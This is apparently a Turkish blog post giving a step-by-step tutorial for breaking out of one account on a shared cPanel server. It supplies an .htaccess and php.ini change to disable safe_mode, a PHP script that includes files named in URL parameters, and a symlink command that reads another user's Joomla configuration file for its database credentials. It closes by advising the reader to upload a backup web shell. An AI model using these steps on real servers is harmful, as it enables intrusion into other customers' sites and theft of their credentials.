Kod:
<Files *.php>
ForceType application/x-httpd-php4
</Files>
Kod:
safe_mode = OFF
Kod:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
oraya yükledim farzedelim yapmamız gerekn şu çektiğimiz pwd dosyasından geçmek istediğimiz dizini bulmak örneğin
/home/poseidon/public_html/ dizininde olduğumuzu farz edeli fakat elimzdeki pwd dosyasında şöyle bir başka dizin bulunmakta
/home/bk:/usr/local/cpanel/bin/noshell
/home/bk2:/usr/local/cpanel/bin/noshell
/home/bk3:/usr/local/cpanel/bin/noshell
/home/bk4:/usr/local/cpanel/bin/noshell
/home/bk5:/usr/local/cpanel/bin/noshell
/home/bk6:/usr/local/cpanel/bin/noshell
hepsini farklı olarak düşünü bizim yapmamız gereken geçmek istediğimiz dizini yazmak örneğin ben bu dizinden /home/bk/public_html/
bir başka dizin olan /home/bk:/usr/local/cpanel/bin/noshell dizinine geçmek istiyorum ve oradaki configi alıp yazdırmak istiyorum dikkat etmemiz gerekn husus sistemdir joomlamı wordpressmi
eğer joomla ise
ln -s //home/bk/public_html/configration.php pose.shtml
diyip enterliyoruz eğer configi çekerse ana dizinde şöyle bir sayfa oluşturacak pose.shtml diye tıkladığımızda config bilgisini karşımızda veya source kısmında olduğunu göreceğiz bunu ctrl+u yaparak görebiliriz
NOT:Sunucu php4'e düşürülürken shell'i kaybedebilirsiniz bu yüzden her ihtimale karşı anadizine bir shell upload edin sıkıntı olmasın
Hiç yorum yok :
Yorum Gönder